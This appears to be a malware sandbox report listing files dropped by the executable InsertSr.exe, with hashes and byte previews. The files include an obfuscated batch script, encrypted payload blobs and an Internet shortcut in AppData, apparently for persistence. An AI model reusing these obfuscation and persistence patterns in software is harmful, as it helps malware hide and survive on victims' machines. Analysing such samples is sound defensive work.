                                                                      MD5:A1B1D9BF9A8803A0AA03003DB6E5C5BB
                                                                      SHA1:280689244F6513993389EB16BC445AB27D4A5E8D
                                                                      SHA-256:A2191B6F2BDDE77BD52659322A374E952AFCAE826429095A676D8A439C56D522
                                                                      SHA-512:0F1687D351F2291F9FD3487BACD3BDB3A93F2A515CAE11941A3A72EB5CBFBDE6CC6F6F4F27C09CEC78C92DCFAD5E6B3D8DCC124C158D27A67D0AB4FF3A1A87F7
                                                                      Malicious:false
                                                                      Preview:Set Shoe=q..pwGConf-Speeds-Months-Jumping-Mirrors-Cave-Demonstrated-Scratch-..EEBias-Bible-Ticket-Canberra-..vBSfMary-Dictionary-Supports-Rewards-Threaded-Examples-Aquarium-Accepts-Depend-..hIGorgeous-Nights-Pottery-Reliability-..VBbbSexual-Four-School-Criteria-Interaction-Recorder-Reputation-..NCjExpansys-Oe-Shemales-..WMFantasy-Hr-Charm-..KABPrivacy-Steal-Unto-..Set Spectacular=0..ovKaren-Expressed-Coverage-Blood-Convergence-Stops-..xnScVaccine-Solo-Seasonal-Surgeon-Election-Maintained-Enforcement-..CFMjDesign-Highways-Just-Finals-Obtain-Suicide-Marked-Cohen-Soundtrack-..XsQFlat-Ivory-Facial-..JWXPlus-Cc-Initiative-Reality-..Set Joy=i..OipExpensive-Advice-Beaver-Kidney-Planners-Terrace-Formula-Sight-Heavy-..AqAScenes-Calm-..vPNJungle-Sufficiently-An-..DILWorldwide-Best-Merge-Candidates-Kurt-Maintenance-..WmzEquipment-Behavioral-Beside-Entertainment-Ahead-Newbie-..GIhYFirms-Hung-Playback-Spider-..eeDanger-..Set Essential=X..ZSMetal-Healthy-Negotiations-Police-Elite-Magnetic-Defensive-
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:ASCII text, with very long lines (376), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):9945
                                                                      Entropy (8bit):5.17404966843657
                                                                      Encrypted:false
                                                                      SSDEEP:192:LVnJWezHSpuHD4O6FKgImRV5OM5YuDkTpM6nHgzPMj0kWtj7mqGSwDqcBJ:LVnWpuHqfRBWuoT3edkI7mq7w2aJ
                                                                      MD5:A1B1D9BF9A8803A0AA03003DB6E5C5BB
                                                                      SHA1:280689244F6513993389EB16BC445AB27D4A5E8D
                                                                      SHA-256:A2191B6F2BDDE77BD52659322A374E952AFCAE826429095A676D8A439C56D522
                                                                      SHA-512:0F1687D351F2291F9FD3487BACD3BDB3A93F2A515CAE11941A3A72EB5CBFBDE6CC6F6F4F27C09CEC78C92DCFAD5E6B3D8DCC124C158D27A67D0AB4FF3A1A87F7
                                                                      Malicious:false
                                                                      Preview:Set Shoe=q..pwGConf-Speeds-Months-Jumping-Mirrors-Cave-Demonstrated-Scratch-..EEBias-Bible-Ticket-Canberra-..vBSfMary-Dictionary-Supports-Rewards-Threaded-Examples-Aquarium-Accepts-Depend-..hIGorgeous-Nights-Pottery-Reliability-..VBbbSexual-Four-School-Criteria-Interaction-Recorder-Reputation-..NCjExpansys-Oe-Shemales-..WMFantasy-Hr-Charm-..KABPrivacy-Steal-Unto-..Set Spectacular=0..ovKaren-Expressed-Coverage-Blood-Convergence-Stops-..xnScVaccine-Solo-Seasonal-Surgeon-Election-Maintained-Enforcement-..CFMjDesign-Highways-Just-Finals-Obtain-Suicide-Marked-Cohen-Soundtrack-..XsQFlat-Ivory-Facial-..JWXPlus-Cc-Initiative-Reality-..Set Joy=i..OipExpensive-Advice-Beaver-Kidney-Planners-Terrace-Formula-Sight-Heavy-..AqAScenes-Calm-..vPNJungle-Sufficiently-An-..DILWorldwide-Best-Merge-Candidates-Kurt-Maintenance-..WmzEquipment-Behavioral-Beside-Entertainment-Ahead-Newbie-..GIhYFirms-Hung-Playback-Spider-..eeDanger-..Set Essential=X..ZSMetal-Healthy-Negotiations-Police-Elite-Magnetic-Defensive-
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):887048
                                                                      Entropy (8bit):6.622152087334158
                                                                      Encrypted:false
                                                                      SSDEEP:12288:wV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:Sxz1JMyyzlohMf1tN70aw8501
                                                                      MD5:DA5E9ED8DD7E20633641F4383FD064C9
                                                                      SHA1:8BA42CF91152401A2E0503E0EF0FF4B0862CC940
                                                                      SHA-256:124E000A0550B77E40D45DB0E5F40B0493EFB70DEAF3AFD242F30D0C9B67FA95
                                                                      SHA-512:8DBF5994C5AB6CB9FA0219D210203BD45F65B80C5819A626E05B416DE56468B86B4E2B29A9F0B407FF89681741EAAECD188E8FDCC16C9B2C0077CD83595EA586
                                                                      Malicious:false
                                                                      Preview:]......j....E....(.I..{L...t..{L.....}....$xL.......KH..yi..........wq....&@..$.e&@..E...........}....{L.uUj...(.I.P.u... .I..}........j..u...8.I.j.....I._^[..]..........t....j...........E...sL.k.C.P&@.W&@..%@...C..%@.W&@................................U..8xL.....M.....t...9.t..@...M..J....@...]...Q.M..E.......H.I..E..8xL..E.P......E...U..M....t.W.}......N..._]...U..QQSVW.}..E.P..7....I..E...l....E...p....E.PV..p.I..M..E.;.t...uc;.x...u[.s..5..I....s........E.......E....;.|.....a....}..t...|...;............}..t......._^[..]....}....t.....x...|......U...M.VW...........|P;......H.Bt.......t<.u..@....M.....B`....8.t".....|.;........Bt....8.t..._^]...2...U..V..W.}.;............Ft.......t.Q.?....Ft.... .......;.....u?...|..Ft......8.u.O......}..........Nx.Nx.Ft.4......FtY.Nx.$...~x.v..Nx.Ft.D...8.t._^]..................j...U..Q..(xL.VW9.0xL.un.=4xL...........h.........Y..................E..}.P. xL......54xL.F.54xL...$xL.....0xL.....9.M..I..O._^..]...j.^3.;.~...$xL....98u#h.....[
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:OpenPGP Secret Key
                                                                      Category:dropped
                                                                      Size (bytes):709632
                                                                      Entropy (8bit):7.999750536119722
                                                                      Encrypted:true
                                                                      SSDEEP:12288:Nfc73CSUDhzd8zmt5PxoZb6rdROwy/Ef1JcOeXm0+G5/7IDN75pDJSLcb:N07YV+oPxoZb6rIMUFW0n5zIDucb
                                                                      MD5:4718907CACC74674022BFB2DE75A6295
                                                                      SHA1:39FB61D02882F0F0DD23A6D14B8B0016F54A4349
                                                                      SHA-256:3571D240390623E02875C7953440216E9D9E840CA9E8A04F07E94CC65A439E3D
                                                                      SHA-512:5228F22505BA6466D6264B3AF5DF9D5807EFD7494111A712463A56A4610BBF70E28B2E25DB86BA9D107A39A12C47950741FAF51F68CDF1BB36E701359F277C39
                                                                      Malicious:false
                                                                      Preview:.vWo....*B...s.2.xP.s.J..{]@....<.2.V.........2I..s......).t=^t.I..5.z.]}~.......z=|.q|.....{..J.i_ZV..I.Lx...x3..S.b...T...2|.k>..C7d..]..I......#:.iY..bZ.z...l.wy..7..!&..Bi.l.`.}.J.6..z....(S...9.E.....kbh.....1.w.%.q.7x.........g.....*.=........DK...._VC..c..{GNG.{..6...lw#d..%).5........a%...g....N...ZUG.......~.T....E.G..".<.5....N...g.bV......v&..G..9....}**..Md{|K.2W.!Sk.5...|..h.g_ui..\.S...M.......'V..4G....>..#..|_.O..U.e]]/...I*.x.y.U...+F...i.....R..L...R. KWV...w.B>.......}`.\XB#*....x...(f.....~H.E.&.3.D2.y$.....J......9.H........=.[\}.#.21...J......z...u...O...4..s.5....~.)N7.+'a..:...\..e1...........^.........\.i5t.}../._.!]...L..x.Q.:M........J.f....U....8....>B.&..4.b..."..l.Q3..9...f..kW.....=p.x....=J....Ax....K....[j<.u...C.,.?......"...._..fC.rt..Qtz'Ln5.e...P.....V..2......%...X..1.l.Nu\..4.T>Q...............co....1....}..f..U..%a...Q.u..;!..#..SD..|...&...?.q..<B..^.....O.>..-O.A......X3........k..p.
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):489837
                                                                      Entropy (8bit):7.999639719112566
                                                                      Encrypted:true
                                                                      SSDEEP:12288:P7nxBPjkhxJUQEfrjpY6gaGVza73UescXJ5N4j72XhyHq:P7nTPgCQEjjeG2a73Ue7XJEj7QyK
                                                                      MD5:CB8D1FF9647A7043E172F3D89F5B4368
                                                                      SHA1:0479927A90C908A547E3C5C195ED2D3780808CC3
                                                                      SHA-256:C1BD610F3AB6739E2FDDB6F76EEE2C7830FD756BA0D9B6EE399BD13C9F75E111
                                                                      SHA-512:4FA01DC89567DCFF7B15389FE3283426B53F5A28425D177557D30176421070A24D2AC5891D535B3E73ECA4893B6FAE3A559E56307029B84F4F69D66B77CB37FB
                                                                      Malicious:false
                                                                      Preview:..lP2S.z.v....OqN`.F.N.k.N<Y..&..d..(S.n.......aq..S..R............X..'g#c.n.&....3".#...H....b...&......72.H.5x>P.#.aG#..._.[."+..E.:..|;.t.AD.1;.8.n........W..o...$.%..S....F....4C...|j...84m....d.J..kx..|.iV8-....(.H%...c6..6.........x. ..L?..Pp.`2R..Q....KL..q.S.}\.Jmj0.w`.e.S.....).;.......`...=C.*...&...).....M../.....8.@";..aa.;4.4.r&..=.....@,.x.9..'3..w~Y.C0...|"P...v.h..OZh....L|.....0...G.<.U...u.Q.Y(8..X...B.h}.^l...J".4Zy..Z..O}'p.a...I...]%.9.....:..............*.r../p0..k..E.F.)..6l..b....%..&...M+!CK..E..7..7|g......w3...^.L..\...y(.....R.. .:!.:0o...=..X.q..iE..b.\.9.f,.C......0s...%....h.J3.'p=@....F28.....f..5wk..;<e......."..QE.p.....*...+k.....}f.;..R..l......X...$u.U8.#b...E..!.\'..............W....Pe.EU..-.(v.yK...}...]h`*.c..`....|..+.t~.'.v...Ut..*.d..m.f.c..sEF_.........[.uR.V...K.e....t.<....@. ...I...O...n...oQf......t.Z'.N.......KM.2T../j.4..`..mO...n.........X..5..e+...`M.ofg0.}PS...^.+.'n2...ZP9J.
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):798720
                                                                      Entropy (8bit):7.999778033726275
                                                                      Encrypted:true
                                                                      SSDEEP:12288:K8RVnbj3FJtN14DD873rmYLCwatJCAsGJRsL+Ev/1d980BEMqQ72CvSF1lniVD2u:V33T238WWCwaQ/RvG0wCvE1oVDj37
                                                                      MD5:90C9581F1EEE0655DB6C69B03CD549B5
                                                                      SHA1:A09488C2FC79D9185869F04480D06123E41A6CEC
                                                                      SHA-256:8FA70ADFDEE491FD73FE7B70318F69B92021DF3DD0FC3E3EF4C554A5BAF4BB3C
                                                                      SHA-512:A3579431E0F6681EEFB09EF5BD062E84FBABD47FB93C1FE1990F8FD425818B647732AB673DEB187E1FD3BEF523C8D386891D664F0417E1C51F760633F5A68250
                                                                      Malicious:false
                                                                      Preview:l .$t.{.l.\J..s..........L.Q..L}K1G.xy(...y...T.. ._......,..t.}..`b6..=..F.wO.......;.Y*?....AM9..MZ..7/..n........P|...%D.....V.R..{.Hlv}3.i.)m...9N..a0dT.V..@..J.....m$..-x.i........L6...-...v*... K.a6.Y.Y.m.Hvn./7......Z.!i.....[\..H@2......]...V....*.W..P...l..H...I....2.L@.It...!I..O....%.R.Gdw../G......;;..pd=.......yU.a.e...!..#KKd....S.]r..!Z..j.R..y./..%.t?.G....P9.&T#.6..x.....&@..t...*.....3.\....F...o,.(..Q..Q.t..~..<.b...r..YI..z.+.o}.V...6......9..ND...@.`.../.k.2K.lv.p..nP.!..j..~A\.G..$.(9.i....S(.`3[29..............-.d.M..8|a...1wW...|gJ...|..e...B........}.$......|j(bas.$........G.....%..g.@)6.Q..-.!.99..uf.qf.m..yH..._.^..^vw..E....c.Q.=..[_zC...g.v.\...f$......;4....:.m.......R6..`Y....-n!..k-..l...... Y-.5.....3A......G..B ..0....0m.....Y8x.j67.P...b3.!..WX.+m8....X..<.G..,..R.......,#..fp.*....Y..V/...xW.L.w..J..\.j.n...........FU.X5...r=..1..I.R.CU...?..U.....,R*.......yZ..$zo.{....../.|^O.....8.x.r9..."3.B..
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):885760
                                                                      Entropy (8bit):7.999752060898126
                                                                      Encrypted:true
                                                                      SSDEEP:24576:HO6xaGUTIVo4yj2OuwX1RmBaNZq4KkrLh23:HObGUTUo4eF/vZqqrLhK
                                                                      MD5:F34FFB21F15B95BA1989B07876A042B3
                                                                      SHA1:1AD3BEF6D5E942BD9C34C27781143CF478EF34E9
                                                                      SHA-256:3FAB51A350FD9588B35281DDDAC46A7F95ACA517B97E35567EFD8C568562C780
                                                                      SHA-512:61C2586B5018D2F5813AA48D9B53BD1E694D04418D388E7185F797B105CEE6382AD85153E043DD999FAEBB1A2380B1CDBD704640D1FAFC9B130C91F86158B581
                                                                      Malicious:false
                                                                      Preview:N..Ms!......=,.j.%...=.up..._?A...Oa.6.r,.:g....k...C........bn..1uf...>..B.*o.....e.A.......I.._~=6a....U....(.Q.T..V.d.i.....}.B.J0./..R..|.c....YR..p..'..\.2..... ... ../Qp.N..#....3..... d........1.[A.rS....w.......w.$.k.Sr.|....V..S..r.?.2U..:....&..I.vW.f!...[.77.Vc..o't..E8....p.7}xc!1rM../..r..`...b......e.5,Aeb..+42:vQ=DrK.5L,.Nv..........b,.I.4.T..^..fM>..h.....!.......A....V.....*..#;...!.%.Z6(..A1\. NV-{..o...).1.~o1s....x..ze...L.....et...A.1....n....51.i..H..,...bA.a..........QI......v..Q..Tl..b.D...fV.........,w..Um.L}..>.9..<c..3=..|!..-(...P.P....P..D .c.n.....].5...o,O.t...K..8<..%.po.#4w.b%_'R;Z...lbyW....J....O=8 .aR.:.m.NX...T...5/.5.i3G.@........-+1...\..8:l..........:O.-.H....J.d...gg.L..J...../.......e%.E.Uq....<.+...+.R...+.{s!..v.V.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H..
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):660480
                                                                      Entropy (8bit):7.9996932677461405
                                                                      Encrypted:true
                                                                      SSDEEP:12288:+9rH7HUXg3bndCh6ERfhgK1A8NU4od05969G6RVeB2LzeTQOU9:+VbUXg3CfhJbNU9s606uIoC9
                                                                      MD5:B5EA13497EAE57FACA5218A55BDD81D1
                                                                      SHA1:B6379326465B2B3DAA2B56CF855017D30C7AEBAA
                                                                      SHA-256:C67D471849F306EB17F543A6478F01DB34EFAE3DD05B78E46D39E28BC1B9496A
                                                                      SHA-512:6884CA2E7A9A38B6E06E289861671A9C0C252AE0D4D6088B696FA943FAC3CE5B0B89E0ADDE8E83A26EC6FB1C3675C8E75A4A9E95713F282E4E5A98CAE4CECAB5
                                                                      Malicious:false
                                                                      Preview:e.C..I......J2...6..e.{R@.....r.V.*..y..iQ..#j'.......*.6L{..h._.LN.x....F.d...d.......Wk..........0.'g!%H.......(..A1....p..ml.'..oH..F;.._h.|...$....!7......|...n.\..g..1J...Z.D.w.S@H.#.........\w...W/z...u.....'I.`D..../..?u.....p.........A.z...y.0...w._+...3..S.2L.....]o...u2.A..j........Q.........Imy.L.2..T...R..k.=...i...$.. f........wmpAX..gd..|1.~......"._.....M....9.a.]...~:hp.....`7W.2R.^.K47...:.J6._:......:.9f.......\...$.C..mp..OX.Q.E}..5.....9.R.D.b..T...~7.rm.I......g.\P..>P4.e..h.;G......U.Y.....Z.3..QB.t~..\.A.y....#w8.y[.M2dj........=_x.\.k.ec........qE>C..o..... .y...7b8..y.......q.l.H<.U......."Ef.`...=.....*....BW....m?.....v.......K._....&.....,8...G...M...o........4..}...l..........y.....>.p...../...U1......w.rP..9.~..!...tC.NR$w_. .]:.~.?..J0.g.bn.......=.?~N...}.p ~@w.`S..(M....^.V..<....*1.......y.x.?[.cS[8....>~....`....@.&./4..^..,.}!G.O,...t:Au.|.....G...Zk.c..zh.I.Ust..9...&.L..lR.,.._A...|..W.osj$K&
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):801792
                                                                      Entropy (8bit):7.99977707187213
                                                                      Encrypted:true
                                                                      SSDEEP:24576:O36Ed4nSSuxLOO7a8F/xJuZ770YhYjNE9:ln8157lF/xJu970Yme9
                                                                      MD5:1097150FDE61428C31E7EF7664F04891
                                                                      SHA1:8885F12AC9F14DBAB3C42619BAA5D0CAAA3959D4
                                                                      SHA-256:B8822B85254FB8EB45D028EC14D2262E6DDC7D21FEB93742E413A7FC6FDB2267
                                                                      SHA-512:A8EFDE5B7C1E44FDFA7BD7953937E7D4772F6CD206AE9D60A2DD885C1DCAD51281B0560BEAE383E74147A2DF4A95537F27736FCECB97F95C5763FE19877B8A20
                                                                      Malicious:false
                                                                      Preview:l..!.V....0.K</...1?..~......C.[0...."a-.Q5AB.]..,.4b ...;.B...=.9Qp..x.U.(..N....h.*.M..y...F.......%.7..9(j....c..5..-.9.Qm..4-.b.......R.pC.....i.......I.?....r.~O..]...HD8...&.pm,Onb`..{.F](.lj.. n.....@...r.aX..k=G.:.'..b ....e..cO3y...>....$..B...g...ntf].KfGe......J.+....p.h.c.9....^~...p.r.?*.b...Kt....~O])....q../...e}.|y.q+?.zk..-..L\...^..MN.^..Pp"......YN.".,>3q.A.#n.[79.l/F..[........g.[.B)..y.t._G..J.%_...KA...wO.B.!.u.>...e..OMn..R..H.o.....*.........q....,.....<.E..l.i*../ %!b......<....r.....*..w.....r.^:WjNao.z.:+.:.....%:..s\...w.'...RIn.%..W..&...G.c.....g..S@!....Z%jWT.]..W+.y.k._Z...r.f..W..X$...@...S).J....XHAT.1..2.....-..O`p..A8.4..pq.3.{.}......W..'r...[}.n.p.{..)...[y`~.6(..u...>.0..;.K1.G....4kd'RC.<*B.Q.!.l..4.y.....6.........m.....i..D.@.zF..........DP|*..P.[.;~........C....>.!.gO...o#.l........wa:.l.,o..&*UM.....{........Tq..:.stR......hp..........^....C.]".$Z...".T6@R......0.Z.N..6.6......W....ur.......+.F
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6592
                                                                      Entropy (8bit):6.173529326074231
                                                                      Encrypted:false
                                                                      SSDEEP:192:LHAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMX:LHAHhww+/2nlP3r1WQ
                                                                      MD5:74A0A10D8879E28CF435CF7C6FED821E
                                                                      SHA1:C5BFFF25492A5B885F6846C80352B6ED5B53785B
                                                                      SHA-256:C3DDAD5013ACEF2A15DDA4CDE3DD48ABC190AD191D2D12C979A9FE1072B2306C
                                                                      SHA-512:4CD9100F3AB73AFFAD00138E96D76E9821B2FE31DC7203DE214B0C2047458C72A6307BD9EE392C63E60A1AA4569FD0ED0DFB8A8C2C848301C7E16391B5DBEC8A
                                                                      Malicious:false
                                                                      Preview:SequenceOctoberContributionRef..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):541696
                                                                      Entropy (8bit):7.999652031061977
                                                                      Encrypted:true
                                                                      SSDEEP:12288:MCrMz2LKeVPeYyfk+gjafJFHQUj7LVC28oO25:qzkKedyfk+gj+HQUY28oP5
                                                                      MD5:680233105A6CF887F2504025597EE1BD
                                                                      SHA1:B833B501366CBF5AE9B3D7A14A4AC02A096BA2C2
                                                                      SHA-256:E2B2F6CA865D668FCA407A08A65E0971B0C6F031E9E1F00720032F6790108296
                                                                      SHA-512:575721CA5676C29927520D6B0E354A33FC25A5BBA36D2BABC9785488BDE8301F6C3F84BFD3D43978690523BF39C9B051AAFF061807A31FDB693425BD5F2EE17B
                                                                      Malicious:false
                                                                      Preview:. .SsB..8..F.......:z.G.\._.<...R.C.h..?>.|J.....,>|.[.4.".../...@.n./x......J...'.T._;.O4?...!......@..B@...2..S.#>X.#.HX..7C.Y.?QQH...yhk..oz....l....kV;.._..?./.O.q.f^K.a..1.7V4').'.od8...:..L/Q. .(1.VS.e.;......k...{..iu..CZ.|"..m....NSr.N.v6....]....<d+.']az..[/..;{....c..|...%[.I..Q..b.:.Y....b.s...Zuk..&G......lc..@SCG...wYA..n".N...E.(..|.#]..Z[."..2..:.1o....a.e...[?..y._,}.bVT7.)v..0/>...M..J.t...k..b<.}...)U..6%..=.g.......X..b....t..d...... .i..lP...N*O...'0w"8......]Y...T..%Z....I....2.5.....*....fT...Co...W6..~..D...Z$...w\,.".r.W..<...k..3Y.....P._$P........l..$v...K/..0..Z....b.e&.._......U.'7.3Nd.N.t....2.Z..^2=#{...3|..ZZ.!...........${.pG...zb9.e......]..(..._.....E-..7.r.......(G|...[....gB. {O..,2n|.'..R..yX.D.(.un.@.Q.>h...z....S...$.V..@............z...n..XI..T.6)%.'dM.....y..?;r.F....1....H.*..y..1......b.A..d..t.....2.~*.G...{z..N....J..=TA.63.z.\.TP.C..l..?.Z.g.-( .|..v.~.nQ.T-1..,b=9/#j...H1...e:...@
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):863232
                                                                      Entropy (8bit):7.999790074089092
                                                                      Encrypted:true
                                                                      SSDEEP:12288:3ENrmH8kYsUET4qtOu12c6hS3ThXGodoD+UOl/NO4tH0vN7eMVkVE6eauQN0mY9i:UgckYswqcU25hSjtQqtl/p2FBkV/
                                                                      MD5:DE288DA987BD185C9B48EBAA350447D6
                                                                      SHA1:8E6311419B3FEE4F908E7566BD26B56170F8C752
                                                                      SHA-256:45193E176EB2E901766F1061F753AE5BF260C65502053A18BBCB495232B66417
                                                                      SHA-512:DF863633D986D5CBBA4898D95AF368819167FA7E9157173A52086F3E213DE457AA4B6027B0D997728191047113B5E140696CEB65501CE807EAE41F0900A36142
                                                                      Malicious:false
                                                                      Preview:.EpJ.i'..F.._.....b.....f.0...H...kx..W..u.aXwu>.t...z8..$n!bS.H...Z....Q1.c.u......|9..g.<T....u.....+.f.)..FL.b.....S...U..Sz...;.....=f.....se...G.m..%..Ss.)......Sr.$....k..i...Y}'..3.......w.U....+.l.".m..%...{>.|..7b(W...dj\...f....t.R.E{...v.2MT..yh..Hr.v.K#.T..V.bq%[...2p..%e..VIp.9.y.........B....-..8....6......+Z.%D{;.|.lR.n.p..{......p...&..Od.fm.\J.r.1..%.c. X..(...R..tL..9.K....u.RG...M.....IiIB..so.Z....X.....0.,h.B..Ez0R,=0a.].$F@........$.$4........Jr.@....;..\P.E/............<6....{.7.......a.x....#M..0.......]...5...@......V=...3....)Z.i...fR.e..2........nG:..J.w.=.z.2....2....7..L......:....i...."..q....d.x.....CY..y.!\.22HA.%.....9...B.B..;..."..r+..t.*{U#&e.q....Dh!U.t...&.OGJ....@y..`k......x..%*.jz._C..pT..4Q....1X.9mG....B..[k.#m.E..[...._..m..4K7.[.R..z.Y}6..JZ>&p...M|`3D.^._..F3.P..(.<...JA.....M.........5.KaFH...xp..s}.<...q?.N...=.^G.zd...G..B>..6v-[..F9+....<..O[..5....k..S.r.yk'q3.1..$Z)i.V...c....X!.X.T.!!...S.|
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):552960
                                                                      Entropy (8bit):7.999624585975711
                                                                      Encrypted:true
                                                                      SSDEEP:12288:hBy5VpFQFTKD+kxLaRpkud1ps2X8bYhcroypGCi+2ou:3y5VpmTKD+Rsuv8bccroypg+2ou
                                                                      MD5:5C52183AB3EF62D282F1BA9F0D12545E
                                                                      SHA1:5837096364ABAAAABBD85E262F0F565DED556131
                                                                      SHA-256:9DE3DAE3ADAEA59C23BC5536A736C3F0140C085D9982269FFBD52A137E13C804
                                                                      SHA-512:896DC24E8F9E0F5FAD4F8FA1AAD28B8F9A4EC1FB29018B63740A518F48C81F8029C60247F40842A1639BCA875215DEE9B915CF36CA30D9DB6D1742B81298C4B4
                                                                      Malicious:false
                                                                      Preview:....&.+.S..a.er............x/s+..f..I.n.......d..q..{g.SR..q.J...J...$Y~<....i.&A. ...c..K#8...P..<...N.e.gMx......~.y.o.WP..M.dY.|.5..v."..w...1...E...d~....J.g+.D.Z........S4......F.pPi.j."A....v.;8.3a.7.N.9.a_.......y.l..Y..'..9k./..\.M:...`....$.#..^`}F..$N|.+..n....tK.K0...bra..N.....'...K{..A..../..]^.v...Sf=n.......nk..V.-z.O2...u..w....jW4....f...x9........;p.Qy.q..5D.$...'.5]...q....E...K..g.d.*.qV`.pD./..L....R.{..!%.-....?......G.o..n..z(..V(.......22.M<.....0..B...\.......ep..wV:.k<.?..0x.x..pD.G.I.s...........[!X..g..c. ...3....>ND.V.R....3X..V.o..Z..Wc...C...`..W...+.*~.h..:..Oh..a.>.x......94S.......]......F...V..$.L.....Z;<%.O.../`yN.g7N..}.:...+ ,..O.[.S)>/.....b&C.=./.v=.......|+......Rz....xCN.`.)TtW.sI.Z..-V.>..K.Q..[!....(q\f..e.A4....|y.Z....=.}&../V.j.K....m...PL.|.oH.@.S5L.Lu..5....TG...RKe2....)]......;S..d.@."...;/...{`.K.....w+Y=}......H5.r...........n,:..(..7........../aJ.....+.kE.z.6..#.K.R.Z..m..5.75.4.L:;R.-. ..
                                                                      Process:C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):416
                                                                      Entropy (8bit):6.2423262451025385
                                                                      Encrypted:false
                                                                      SSDEEP:12:Ei4vAbT6X4arcZmY7rjAPpD5wejDD5h+HBpF93zh:Me6Xh8fr8P155DDWhpFVzh
                                                                      MD5:409D137F2D82C0B46DB2F359FDB18706
                                                                      SHA1:66C6D29DAD0C12C20B91E93D3EAEC725C282FBEC
                                                                      SHA-256:74AAA8B2DA17F4CCEADC9D43AE273B728F9C96FF398FF22F30B4A2AD5664391F
                                                                      SHA-512:237BA8159FE5B41D607E6CB3CB725695250B186ADE32747CF0AF7279CAE563139B835269B34A01E44668216A44AF56872CDE0CA03EADE58F0132DC2B7A66A13E
                                                                      Malicious:false
                                                                      Preview:...'.4.....".\.(S /,A.:RL.,0]? .X..0M...QR-'@.=.Q.])Z.,.\..&M][.XS'<^<./U6.*E."....#.*)....;.-..Y.._FP.*A'+^WV.5_/V.@+;,[../G!W.\S..P\ W_/..@/_QU?(.X.7$B)\>..9^.3....Z..:.TS..7A!/(L.WTPPV!_,..M[W5[.0#_.X#Q!#$G?.<_3=*U&>R_..[@..TZ(Z.X#W.B.#P..[..!.!...#.\*.S67WA. SL./'X..+V.&.[..(G.*._. .P,:.Y#$.@#:&Q.X?Y02;X^[.M(\.[1..Z..#P.%'E.9>.Q;..V....;..)..Y:.^F!.=A.: P"_1Q.."@'%.R.^/Q3P#^.^6M5?3[.6X^!3.V..5G&.7_69-U..0].1_
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" >), ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):98
                                                                      Entropy (8bit):4.7551596204856645
                                                                      Encrypted:false
                                                                      SSDEEP:3:HRAbABGQaFyw3pYoN+E2J5sMLTrABDcb:HRYF5yjoN723saABDw
                                                                      MD5:8125B47116C541239E3500828EB8F41D
                                                                      SHA1:E715A37182EE4842946B36E0EF7F778DBF8E5A5E
                                                                      SHA-256:61D283B69D92456EB6FB03F7B21F88D808792BB8F1C472528C611247E7EA6FD1
                                                                      SHA-512:BFC5697B485D7D2CD95B7D52850D5678899CF1F9289BE4000007020B4333A64951807A98E72EB5A187ED9F697CC73588CE91F8C25C4BB618EF2FB4A0735384C8
                                                                      Malicious:true
                                                                      Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" ..
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):5.202035015368334
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:InsertSr.exe
                                                                      File size:45'088'780 bytes
                                                                      MD5:c4c26460f0f0fc5f6acb5a9dca7d251c
                                                                      SHA1:5a9a4337d0159af2d23457a396ebc4db5114aabf
                                                                      SHA256:68da2cf9516fa5b50b96c7b63d3fab3149497226c3ee7b444f5be1d292df4a20
                                                                      SHA512:9d56e09714c9bd78c1d1c0f7e469f1c206481baa708e660f8cff960598b699197910eb5b5aff9d3c8738443ba24081c2479be8bb401f4e6ea3707ba401d4b0e7
